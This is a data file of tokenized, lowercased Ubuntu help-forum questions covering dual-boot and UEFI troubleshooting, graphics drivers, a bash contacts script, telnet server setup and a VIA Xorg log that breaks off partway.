439538	opening ubuntu partition in windows 7	i 'm curious , is it possible to be logged on to my windows 7 partition , then from there also use ubuntu alongside windows 7 , say through a window or something along those lines ? because i have all of my things i need on windows such as microsoft word , itunes , etc . however , i need to do processes in ubuntu which can take hours to complete . basically , i would like to be able to do things in windows while sort of running ubuntu in the background . i 've already dual booted my machine and everything runs properly . i would want to do this with my computer as is , without creating a virtual machine .
439539	can you run unity8 as your desktop ?	i know you can run unity8 on your desktop , which will pop up a qml phone shell , but can you run it as your desktop ? if so how do you achieve this , are there things not yet working on it ? my confusion here is whether unity8 has a desktop mode/tablet mode/tv mode along side the phone mode , or are these slated for a future release .
439545	glitches after closing/opening laptop lid . t410p , nvidia	i 've just installed ubuntu 12.04 on a lenovo t440p . i have an integrated intel gpu , which works fine ( until now ) , and another gpu ( nvidia geforce 730m ) which i wanted to use instead . i installed the drivers but i had the following problem : whenever i close the lid the laptop goes into sleep mode , but when i open the lid , the screen shows crap ( it 's not black , it has glitches ) and it does n't return normal . it 's kind of annoying since one has to shut down the computer brutally . i also tried installing directly the drivers which one can download from the nvidia website , or doing everything on ubuntu 13.10 but this does n't change much . note that this only happens when i 'm using the nvidia gpu . if i deactivate the driver for the nvidia , and use the intel instead , then the screen works fine , also after having reopened the lid after sleep mode . with ubuntu 13.10 it 's the same . i have read in some forums that some other users had the problem that they 're screen went black after sleep mode , but i could n't find any post about glitches , and i also tried the solutions for the black screen . if there is a similar post , please delete this one , if not , i 'd be happy to hear from someone that had the same problem or that has a clue about it ! thanks , nico
439546	i would like to uninstal windows vista and just use ubuntu	hi i am new to ubuntu after could anyone help me to remove windows i do n't want this option when i log in to my laptop , please answer without to much technical jargon if possible
439552	how can i write a script to install bleachbit only if the version installed is not a certain version ?	i want to write a bash script to download and install bleachbit from a .deb file only if the version already installed is not 1.0 . i am using ubuntu 12.04 and bleachbit is only version 0.9 in the official repositories and i can not find a ppa with version 1.0 for ubuntu precise . how can i do this ?
439555	how to disable fast boot setting ?	i have an acer aspire v3-571 running windows 8.1 . i want to give ubuntu a go . i started looking at a few dual boot guides and tried disabling fast boot and switching to legacy bios . when looking for fastboot setting , i went into power options . power options showed unavailable options and there were no signs of `` fast boot '' there . regression when i changed from uefi to legacy , it brought up an error to tell me it could n't find even windows . how to disable fast boot setting ? how to boot into windows even when in legacy bios ?
439556	how can i delete a multi-line record from a text file ?	for example test.txt contains : hi hello hi world the code below removes a word from test.txt and creates a temp file test_removed.txt which contains the : # ! /bin/bash echo -n enter input : read input sed -e `` /^ $ { input } /d '' test.txt > test_removed.txt the code below searches for your word and will print it out . for example , if you search `` hi '' , it will print out `` hi hi world '' exactly like that all in 1 line . # ! /bin/bash echo -n `` enter input : `` read input echo 'grep $ input test.txt |awk -f '' : '' { print $ 0 } '' in my code below , i noticed that in the last line of code in the `` a '' block of code , if instead of making a new line for each of the 6 pieces of information asked of the user , it had it all in 1 line then the code above to remove and search will do it correctly . but since there are multiple lines to remove i 'm not sure what to do . to remove , it just asks the user for first and last name . to search it just asks for first name . # ! /bin/bash ok=0 ; while ( ( ok==0 ) ) do echo `` main menu : '' echo -e `` \t ( a ) add '' echo -e `` \t ( b ) remove '' echo -e `` \t ( c ) seach '' echo -e `` \t ( d ) display contacts '' echo -e `` \t ( e ) exit '' echo -n `` please enter your choice : '' read choice case $ choice in `` a '' | '' a '' ) ok=1 echo -e `` [ add c ontact ] '' echo -n `` first n ame : `` read firstname echo -n `` last n ame : `` read lastname echo -n `` phone number : `` read phonenumber echo -n `` address : `` read address echo -n `` email : `` read email echo `` $ firstname $ lastname is added to your contacts '' echo -e `` first name : $ firstname\nlast name : $ lastname\nphone number : $ phonenumber\naddress : $ address\nemail : $ email\n\n '' > > ./contacts_firstname ; ; `` b '' | '' b '' ) ok=1 echo -e `` [ remove a c ontact ] '' echo -n `` first n ame : `` read first echo -n `` last n ame : `` read last sed -e `` /^ $ { first } /d '' contacts_firstname > contacts ; ; `` c '' | '' c '' ) ok=1 echo -e `` [ search c ontacts ] '' echo -n `` search by the contact 's first n ame : `` read fname echo 'grep $ fname contacts_firstname | awk -f '' : '' ' { print $ 0 } '' ; ; `` d '' | '' d '' ) ok=1 ; ; `` e '' | '' e '' ) exit ; ; * ) echo `` invalid answer , please try again '' ; ; esac done echo `` you entered $ choice ''
439557	ubuntu 13.10 shutdown failure	my configuration processor : intel® core™ i5-4440 cpu @ 3.10ghz × 4 ; motherboard : intel db85fl ; graphics : intel® haswell desktop ; memory : 4 gib ; os : ubuntu 13.10 , 64bit , on whole 500 gb hdd . my problem the sytem shuts down correctly from gui and different commands executed through terminal . but after 2/3 seconds , it boots again all by itself . please suggest how can i shut down the computer completely ?
439559	trouble installing squidclamav	according to this tutorial i installed clamav , squidclamav and c-icap . in section [ 2 ] i should edit /etc/squidclamav.conf but it does not exist . did something go wrong during installation ? any help appreciated .
439561	accessing internet from ubuntu 13.10	i recently downloaded ubuntu 13.10 . everything seems ok accept t internet connection . it does not see any wireless internets including mine . i 'm guessing it does n't see my card . i previously had windows 7 and vista on the machine i am using and the internet connected at install with no problem . the card is bcm 4311 802.11b/g wlan . can you help . g.dgibby
439562	background picture not showing after editing with dconf-editor	to remove a desktop item ( in the process of replacing nautilus with an older version , a `` computer '' icon appeared on the desktop ) , i used dconf-editor to toggle the entry show-desktop-icons in org.gnome.desktop.background . this worked , but after a reboot , the background ( previously a picture ) does not show . instead : a black screen is shown . reading the configuration in dconf , the values set are : color-shading-type : solid draw-background : true picture-opacity : 100 picture-options : zoom picture-uri : file : ///usr/share/backgrounds/last_breath % e2 % 80 % a6_by_francisco_javier_epinoza_p % c3 % a9rez.jpg primary-color : # 000000 secondary-color : # 000000 show-desktop-icons : false i 've checked the location of the file : it exists as expected . system settings > appearance also reports this background . how to re-enable the background image ?
439563	turn off graphics card and hdmi output ubuntu server	i have an old laptop which i am turning into a server . its graphics card is a mobility radeon . i am trying to turn off the card as well as the hdmi , vga outputs . i narrowed the name of the pci device to 01:05.0 ( see below ) , and cd-ed into /sys/bus/pci/devices/0000:01.05.0 ( see below a ls output ) . but from there it 's not clear what i 'm supposed to do to turn off both the card and the hdmi , sound , and other video outputs . thanks for any hint ! root @ lduros-lifebook-ph520 : /sys/bus/pci/devices/0000:01:05.0 # lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] rs880 host bridge 00:01.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:05.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 1 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 41 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 10h processor link control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] 01:05.1 audio device : advanced micro devices , inc. [ amd/ati ] rs880 hdmi audio [ radeon hd 4200 series ] 02:00.0 ethernet controller : qualcomm atheros ar8152 v1.1 fast ethernet ( rev c1 ) 03:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) root @ lduros-lifebook-ph520 : /sys/bus/pci/devices/0000:01:05.0 # pwd /sys/bus/pci/devices/0000:01:05.0 root @ lduros-lifebook-ph520 : /sys/bus/pci/devices/0000:01:05.0 # ls backlight class d3cold_allowed driver firmware_node i2c-1 i2c-4 local_cpus power remove resource resource1 rom subsystem_vendor boot_vga config device drm graphics i2c-2 irq modalias power_method rescan resource0 resource2 subsystem uevent broken_parity_status consistent_dma_mask_bits dma_mask_bits enable i2c-0 i2c-3 local_cpulist msi_bus power_profile reset resource0_wc resource5 subsystem_device vendor
439564	ubuntu wo n't load after installation ( uefi problem ? )	i just bought a new notebook , hp 250 g2 , with no operating system ( only freedos ) so i thought i could just install ubuntu without any of the problems i had previously experienced on other machines with windows 8 pre-installed ... i 'll start by saying that i do n't know anything about uefi , efi , legacy and stuff like that , so be patient with me . anyway , ubuntu was n't loading from the live usb so i did the nomodeset thing ( found on this forum ) , and finally managed to install it . after installation , i see the grub menu , but when i try and load it , it just shows the purple screen and does n't go forward . i tried with both normal and recovery mode , and also tried with the nomodeset again but no luck so far . ubuntu just does n't load ... is there anything that i can do to solve it ? i tried disabling the uefi mode but my bios setup does n't have the option to disable it ( and same thing for the secure boot ) . the only thing i can disable is the legacy mode ... as i need an operating system asap in order to be able to work from home tonight , i now tried to install windows 8 from the installation cd , but now it does n't load either ! everywhere i go , i keep seeing the grub menu with the options of the installed ubuntu ( of course the ubuntu live usb is no longer inserted ) . please help somehow , thanks ! update : now when i want to load ubuntu from the live usb , it goes to a propt page with `` ubuntu @ ubuntu : ^ $ '' , waiting for a command ...
439570	déjà dup amazon s3 restore fails	backup ( deja-dup v22 ) failed to do a restore of a single folder from my amazon s3 . here 's the error message : backendexception : error downloading s3+http : //a.com/bars/foobars/duplicity-full.20140222t101621z.vol67.difftar.gpg i 'm running ubuntu 12.04 lts on a mbp . the folder i 'm trying to backup from s3 is set to store as amazon glacier storage and its encrypted with gpg . any help would rock !
439572	how to install grub on pc with ubuntu 13.10_x64 from live dvd	preface : this is my first ubuntu install from a live dvd . i have very little experience with gnu/linux ; however i have in the past installed kwheezy after burning an iso without any problems . regarding install failure of grub from ubuntu 13.10 live dvd this is the error message that i receive : unable to intall grub in /dev/sda executing ' grub-install/dev/dag ' failed . this is a fatal error . s i am trying this installation on a desktop pc with 16g of ram and 3+tb of hds . and is amd64 powered . please any assistance will be greatly appreciated . and quiet my son 's criticism that linux starts out and usually stays `` broken '' , and is not for the most part for non pc power users . in advance , thank you very much for any help .
439573	i can not boot into ubuntu 12.10 after installing it on windows 8	i just installed ubuntu 12.10 64bit on my hp probook 4540s windows 8 laptop , after installation i cant boot into ubuntu , the system boots directly into my windows . here are my installtion settings ... i turned off fast boot on windows 8 i turned off secure boot i changed from uefi mode to legacy mode ( because ubuntu was not installing from a liveusb when uefi is on ) . i created three partitions , one for swap , one for / root partition , and one for /home partition . after installation , i installed boot-repair and run a boot-repair on the system . after the boot-repair process , i changed back to uefi mode and it boots directly into windows . i tried using bcd but it was only seeing the windows bootloader and no ubuntu . please how do i make this work..
439574	telnet server not starting	i am installing ubuntu server 13.10 and cant get telnet working on the server . i have installed both xinet.d & telnetd thru apt-get and restarted xinetd but nothing is started when i do a netstat -l. in googling , the trouble i see mention of adding telnet stream tcp wait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd line to /etc/inetd.conf . i have no inetd.conf . i see that inetd has been depracated and i put the line in xinetd.conf and restarted xinetd service but still no telnet listening . can someone advise me on what the proper settings for the telnet server and what files they should be in . here is the content of my xinetd.conf file : # simple configuration file for xinetd # # some defaults , and include /etc/xinetd.d/ defaults { # please note that you need a log_type line to be able to use log_on_success # and log_on_failure . the default is the following : # log_type = syslog daemon info } includedir /etc/xinetd.d # : standard : these are standard services . telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd thanks
439576	add via driver from command line prompt	i 've tried upgrading a windows xp environment to ubuntu 12.04 lts . i get the `` low-graphics mode '' screen that stalls . i know that error is well-documented for ati/amd , however this machine has a via technologies k8m890ce set . would you help me get the correct driver loaded ? i 'm not scared of using the command line , so long as there are step-by-step , accurate directions . i 've tried installing openchrome , remove/install fglrx , modifying xorg.conf with no success yet ... this is a desktop pc with an amd athlon 64 3200+ cpu and 1 gb ram . here 's my /var/log/xorg.0.log : [ 35.456 ] x.org x server 1.14.5 release date : 2013-12-12 [ 35.456 ] x protocol version 11 , revision 0 [ 35.456 ] build operating system : linux 2.6.42-37-generic i686 ubuntu [ 35.456 ] current operating system : linux bryan-nobilis 3.11.0-15-generic # 25~precise1-ubuntu smp thu jan 30 17:42:40 utc 2014 i686 [ 35.456 ] kernel command line : boot_image=/boot/vmlinuz-3.11.0-15-generic root=uuid=b59100ab-1c24-4c36-a9f9-3957fafaf902 ro quiet splash vt.handoff=7 [ 35.456 ] build date : 06 january 2014 01:41:06pm [ 35.456 ] xorg-server 2:1.14.5-1ubuntu2~saucy1~precise2 ( for technical support please see h'ttp : //ww'w.ubuntu.com/support ' ) [ 35.456 ] current version of pixman : 0.30.2 [ 35.456 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 35.456 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 35.456 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : wed mar 26 08:20:23 2014 [ 35.692 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 35.935 ] ( == ) no layout section . using the first screen section . [ 35.935 ] ( == ) no screen section available . using defaults . [ 35.935 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 35.935 ] ( ** ) | | -- > monitor `` '' [ 35.968 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 35.968 ] ( == ) automatically adding devices [ 35.968 ] ( == ) automatically enabling devices [ 35.968 ] ( == ) automatically adding gpu devices [ 36.031 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 36.031 ] entry deleted from font path . [ 36.031 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 36.031 ] entry deleted from font path . [ 36.031 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 36.031 ] entry deleted from font path . [ 36.064 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 36.064 ] entry deleted from font path . [ 36.064 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 36.064 ] entry deleted from font path . [ 36.064 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 36.064 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 36.064 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 36.100 ] ( ii ) loader magic : 0xb7753620 [ 36.100 ] ( ii ) module abi versions : [ 36.100 ] x.org ansi c emulation : 0.4 [ 36.100 ] x.org video driver : 14.1 [ 36.100 ] x.org xinput driver : 19.1 [ 36.100 ] x.org server extension : 7.0 [ 36.101 ] ( -- ) pci : * ( 0:1:0:0 ) 1106:3230:105b:0c84 rev 17 , mem @ 0xc0000000/268435456 , 0xdd000000/16777216 , bios @ 0x ? ? ? ? ? ? ? ? /65536 [ 36.102 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 36.120 ] initializing built-in extension generic event extension [ 36.120 ] initializing built-in extension shape [ 36.120 ] initializing built-in extension mit-shm [ 36.120 ] initializing built-in extension xinputextension [ 36.120 ] initializing built-in extension xtest [ 36.120 ] initializing built-in extension big-requests [ 36.120 ] initializing built-in extension sync [ 36.120 ] initializing built-in extension xkeyboard [ 36.120 ] initializing built-in extension xc-misc [ 36.120 ] initializing built-in extension security [ 36.120 ] initializing built-in extension xinerama [ 36.120 ] initializing built-in extension xfixes [ 36.120 ] initializing built-in extension render [ 36.120 ] initializing built-in extension randr [ 36.120 ] initializing built-in extension composite [ 36.120 ] initializing built-in extension damage [ 36.120 ] initializing built-in extension mit-screen-saver [ 36.120 ] initializing built-in extension double-buffer [ 36.120 ] initializing built-in extension record [ 36.120 ] initializing built-in extension dpms [ 36.120 ] initializing built-in extension x-resource [ 36.120 ] initializing built-in extension xvideo [ 36.120 ] initializing built-in extension xvideo-motioncompensation [ 36.120 ] initializing built-in extension xfree86-vidmodeextension [ 36.120 ] initializing built-in extension xfree86-dga [ 36.120 ] initializing built-in extension xfree86-dri [ 36.120 ] initializing built-in extension dri2 [ 36.120 ] ( ii ) `` glx '' will be loaded by default . [ 36.120 ] ( ii ) loadmodule : `` dri2 '' [ 36.120 ] ( ii ) module `` dri2 '' already built-in [ 36.120 ] ( ii ) loadmodule : `` glamoregl '' [ 36.197 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 36.451 ] ( ii ) module glamoregl : vendor= '' x.org foundation '' [ 36.451 ] compiled for 1.14.5 , module version = 0.5.1 [ 36.451 ] abi class : x.org ansi c emulation , version 0.4 [ 36.451 ] ( ii ) loadmodule : `` glx '' [ 36.465 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 36.488 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 36.488 ] compiled for 1.14.5 , module version = 1.0.0 [ 36.488 ] abi class : x.org server extension , version 7.0 [ 36.489 ] ( == ) aiglx enabled [ 36.489 ] loading extension glx [ 36.489 ] ( == ) matched openchrome as autoconfigured driver 0 [ 36.489 ] ( == ) matched vesa as autoconfigured driver 1 [ 36.489 ] ( == ) matched modesetting as autoconfigured driver 2 [ 36.489 ] ( == ) matched fbdev as autoconfigured driver 3 [ 36.489 ] ( == ) assigned the driver to the xf86configlayout [ 36.489 ] ( ii ) loadmodule : `` openchrome '' [ 36.489 ] ( ii ) loading /usr/lib/xorg/modules/drivers/openchrome_drv.so [ 36.502 ] ( ii ) module openchrome : vendor= '' htt'p : //ope'nchrom'e.org/ '' [ 36.502 ] compiled for 1.14.5 , module version = 0.3.1 [ 36.502 ] module class : x.org video driver [ 36.502 ] abi class : x.org video driver , version 14.1 [ 36.502 ] ( ii ) loadmodule : `` vesa '' [ 36.502 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 36.505 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 36.505 ] compiled for 1.14.5 , module version = 2.3.2 [ 36.505 ] module class : x.org video driver [ 36.505 ] abi class : x.org video driver , version 14.1 [ 36.505 ] ( ii ) loadmodule : `` modesetting '' [ 36.505 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 36.510 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 36.510 ] compiled for 1.14.5 , module version = 0.8.0 [ 36.510 ] module class : x.org video driver [ 36.510 ] abi class : x.org video driver , version 14.1 [ 36.510 ] ( ii ) loadmodule : `` fbdev '' [ 36.510 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 36.520 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 36.520 ] compiled for 1.14.5 , module version = 0.4.3 [ 36.520 ] module class : x.org video driver [ 36.520 ] abi class : x.org video driver , version 14.1 [ 36.520 ] ( ii ) openchrome : driver for via chrome chipsets : cle266 , km400/kn400 , k8m800/k8n800 , pm800/pm880/cn400 , vm800/p4m800pro/vn800/cn700 , cx700/vx700 , k8m890/k8n890 , p4m890 , p4m900/vn896/cn896 , vx800/vx820 , vx855/vx875 , vx900 [ 36.520 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 36.520 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 36.520 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 36.521 ] ( ++ ) using vt number 7 [ 36.521 ] ( ! ! ) via technologies does not support this driver in any way . [ 36.521 ] ( ! ! ) for support , please refer to h'ttp : //www.'openc'hrome.org/ . [ 36.521 ] ( ! ! ) ( openchrome 0.3.1 release ) [ 36.521 ] ( ww ) falling back to old probe method for vesa [ 36.521 ] ( ww ) falling back to old probe method for modesetting [ 36.521 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 36.521 ] ( ww ) falling back to old probe method for fbdev [ 36.521 ] ( ii ) loading sub module `` fbdevhw '' [ 36.521 ] ( ii ) loadmodule : `` fbdevhw '' [ 36.521 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 36.524 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 36.524 ] compiled for 1.14.5 , module version = 0.0.2 [ 36.524 ] abi class : x.org video driver , version 14.1 [ 36.524 ] ( ii ) chrome ( 0 ) : viapreinit [ 36.524 ] ( ii ) chrome ( 0 ) : viagetrec [ 36.524 ] ( -- ) chrome ( 0 ) : chipset : k8m890/k8n890 [ 36.524 ] ( -- ) chrome ( 0 ) : chipset revision : 0 [ 36.609 ] ( ee ) chrome ( 0 ) : [ drm ] failed to open drm device for pci:0000:01:00.0 : no such file or directory [ 36.617 ] ( ii ) loading sub module `` vgahw '' [ 36.617 ] ( ii ) loadmodule : `` vgahw '' [ 36.617 ] ( ii ) loading /usr/lib/xorg/modules/libvgahw.so [ 36.618 ] ( ii ) module vgahw : vendor= '' x.org foundation '' [ 36.618 ] compiled for 1.14.5 , module version = 0.1.0 [ 36.618 ] abi class : x.org video driver , version 14.1 [ 36.618 ] ( -- ) chrome ( 0 ) : probed amount of videoram = 65536 kb [ 36.618 ] ( ii ) chrome ( 0 ) : viamapmmio [ 36.618 ] ( -- ) chrome ( 0 ) : mapping mmio @ 0xdd000000 with size 0xd000 [ 36.618 ] ( -- ) chrome ( 0 ) : mapping bitblt mmio @ 0xdd200000 with size 0x200000 [ 36.618 ] ( ii ) chrome ( 0 ) : vgahwgetiobase : hwp- > iobase is 0x03d0 [ 36.618 ] ( ii ) chrome ( 0 ) : viamapfb [ 36.618 ] ( -- ) chrome ( 0 ) : mapping framebuffer @ 0xc0000000 with size 0x4000000 [ 36.619 ] ( -- ) chrome ( 0 ) : frame buffer start : 0xb2a97000 , free start : 0x0 end : 0x4000000 [ 36.619 ] ( ii ) chrome ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 36.619 ] ( == ) chrome ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 36.619 ] ( == ) chrome ( 0 ) : rgb weight 888 [ 36.619 ] ( == ) chrome ( 0 ) : default visual is truecolor [ 36.619 ] ( ii ) chrome ( 0 ) : viasetupdefaultoptions - setting up default chipset options . [ 36.619 ] ( == ) chrome ( 0 ) : shadow framebuffer is disabled . [ 36.619 ] ( == ) chrome ( 0 ) : hardware acceleration is enabled . [ 36.619 ] ( == ) chrome ( 0 ) : using exa acceleration architecture . [ 36.619 ] ( == ) chrome ( 0 ) : exa composite acceleration disabled . [ 36.619 ] ( == ) chrome ( 0 ) : exa scratch area size is 4096 kb . [ 36.619 ] ( == ) chrome ( 0 ) : using hardware two-color cursors and software full-color cursors . [ 36.619 ] ( == ) chrome ( 0 ) : gpu virtual command queue will be enabled . [ 36.619 ] ( == ) chrome ( 0 ) : dri irq will be enabled if dri is enabled . [ 36.619 ] ( == ) chrome ( 0 ) : agp dma will be disabled if dri is enabled . [ 36.619 ] ( == ) chrome ( 0 ) : pci dma will not be used for xv image transfer if dri is enabled . [ 36.619 ] ( == ) chrome ( 0 ) : will not enable vbe modes . [ 36.619 ] ( == ) chrome ( 0 ) : vbe vga register save & restore will not be used if vbe modes are enabled . [ 36.619 ] ( == ) chrome ( 0 ) : xv bandwidth check is enabled . [ 36.619 ] ( == ) chrome ( 0 ) : will not impose a limit on video ram reserved for dri . [ 36.619 ] ( == ) chrome ( 0 ) : will try to allocate 32768 kb of agp memory . [ 36.619 ] ( == ) chrome ( 0 ) : tv dotcrawl is disabled . [ 36.619 ] ( == ) chrome ( 0 ) : tv deflicker is set to 0 . [ 36.619 ] ( == ) chrome ( 0 ) : no default tv type is set . [ 36.619 ] ( == ) chrome ( 0 ) : no default tv output signal type is set . [ 36.619 ] ( == ) chrome ( 0 ) : no default tv output port is set . [ 36.619 ] ( == ) chrome ( 0 ) : will not print vga registers . [ 36.619 ] ( == ) chrome ( 0 ) : will not scan i2c buses . [ 36.619 ] ( ii ) chrome ( 0 ) : ... finished parsing config file options . [ 36.619 ] ( -- ) chrome ( 0 ) : detected foxconn k8m890m2ma-rs2h . card-ids ( 105b| c84 ) [ 36.619 ] ( ii ) chrome ( 0 ) : detected memclk 7 [ 36.619 ] ( ii ) chrome ( 0 ) : viagetmemorybandwidth . memory type : 7 [ 36.619 ] ( ii ) chrome ( 0 ) : detected tv standard : ntsc . [ 36.619 ] ( ii ) loading sub module `` ramdac '' [ 36.619 ] ( ii ) loadmodule : `` ramdac '' [ 36.619 ] ( ii ) module `` ramdac '' already built-in [ 36.619 ] ( ii ) loading sub module `` i2c '' [ 36.619 ] ( ii ) loadmodule : `` i2c '' [ 36.619 ] ( ii ) module `` i2c '' already built-in [ 36.619 ] ( ii ) chrome ( 0 ) : viai2cinit [ 36.636 ] ( ii ) chrome ( 0 ) : viai2cbus1init [ 36.636 ] ( ii ) chrome ( 0 ) : i2c bus `` i2c bus 1 '' initialized . [ 36.636 ] ( ii ) chrome ( 0 ) : viai2cbus2init [ 36.636 ] ( ii ) chrome ( 0 ) : i2c bus `` i2c bus 2 '' initialized . [ 36.636 ] ( ii ) chrome ( 0 ) : viai2cbus3init [ 36.636 ] ( ii ) chrome ( 0 ) : i2c bus `` i2c bus 3 '' initialized . [ 36.637 ] ( ii ) loading sub module `` ddc '' [ 36.637 ] ( ii ) loadmodule : `` ddc '' [ 36.637 ] ( ii ) module `` ddc '' already built-in [ 36.637 ] ( ii ) chrome ( 0 ) : viaoutputsdetect [ 36.637 ] ( == ) chrome ( 0 ) : lvds-0 : digital output bus width is 12 bits . [ 36.637 ] ( == ) chrome ( 0 ) : lvds-0 : dvi center is disabled . [ 36.637 ] ( == ) chrome ( 0 ) : lvds panel will not be forced . [ 36.637 ] ( == ) chrome ( 0 ) : panel size is not selected from config file . [ 36.637 ] ( ii ) chrome ( 0 ) : output vga-1 has no monitor section [ 36.638 ] ( ii ) chrome ( 0 ) : i2c device `` i2c bus 1 : ddc2 '' registered at address 0xa0 . [ 36.690 ] ( ii ) chrome ( 0 ) : edid for output vga-1 [ 36.690 ] ( ii ) chrome ( 0 ) : manufacturer : acr model : 1a5 serial # : 353434227 [ 36.690 ] ( ii ) chrome ( 0 ) : year : 2011 week : 51 [ 36.690 ] ( ii ) chrome ( 0 ) : edid version : 1.3 [ 36.690 ] ( ii ) chrome ( 0 ) : analog display input , input voltage level : 0.700/0.700 v [ 36.690 ] ( ii ) chrome ( 0 ) : sync : separate [ 36.690 ] ( ii ) chrome ( 0 ) : max image size [ cm ] : horiz . : 44 vert . : 25 [ 36.690 ] ( ii ) chrome ( 0 ) : gamma : 2.20 [ 36.690 ] ( ii ) chrome ( 0 ) : dpms capabilities : off ; rgb/color display [ 36.690 ] ( ii ) chrome ( 0 ) : first detailed timing is preferred mode [ 36.690 ] ( ii ) chrome ( 0 ) : redx : 0.640 redy : 0.330 greenx : 0.300 greeny : 0.600 [ 36.690 ] ( ii ) chrome ( 0 ) : bluex : 0.150 bluey : 0.060 whitex : 0.312 whitey : 0.329 [ 36.690 ] ( ii ) chrome ( 0 ) : supported established timings : [ 36.690 ] ( ii ) chrome ( 0 ) : 720x400 @ 70hz [ 36.690 ] ( ii ) chrome ( 0 ) : 640x480 @ 60hz [ 36.690 ] ( ii ) chrome ( 0 ) : 640x480 @ 67hz [ 36.690 ] ( ii ) chrome ( 0 ) : 640x480 @ 72hz [ 36.690 ] ( ii ) chrome ( 0 ) : 640x480 @ 75hz [ 36.690 ] ( ii ) chrome ( 0 ) : 800x600 @ 56hz [ 36.690 ] ( ii ) chrome ( 0 ) : 800x600 @ 60hz [ 36.690 ] ( ii ) chrome ( 0 ) : 800x600 @ 72hz [ 36.690 ] ( ii ) chrome ( 0 ) : 800x600 @ 75hz [ 36.690 ] ( ii ) chrome ( 0 ) : 832x624 @ 75hz [ 36.690 ] ( ii ) chrome ( 0 ) : 1024x768 @ 60hz [ 36.690 ] ( ii ) chrome ( 0 ) : 1024x768 @ 70hz [ 36.690 ] ( ii ) chrome ( 0 ) : 1024x768 @ 75hz [ 36.690 ] ( ii ) chrome ( 0 ) : 1152x864 @ 75hz [ 36.690 ] ( ii ) chrome ( 0 ) : manufacturer 's mask : 0 [ 36.690 ] ( ii ) chrome ( 0 ) : supported standard timings : [ 36.690 ] ( ii ) chrome ( 0 ) : # 0 : hsize : 1152 vsize 864 refresh : 75 vid : 20337 [ 36.690 ] ( ii ) chrome ( 0 ) : # 1 : hsize : 1280 vsize 720 refresh : 60 vid : 49281 [ 36.690 ] ( ii ) chrome ( 0 ) : # 2 : hsize : 1280 vsize 800 refresh : 60 vid : 129 [ 36.690 ] ( ii ) chrome ( 0 ) : # 3 : hsize : 1600 vsize 900 refresh : 60 vid : 49321 [ 36.690 ] ( ii ) chrome ( 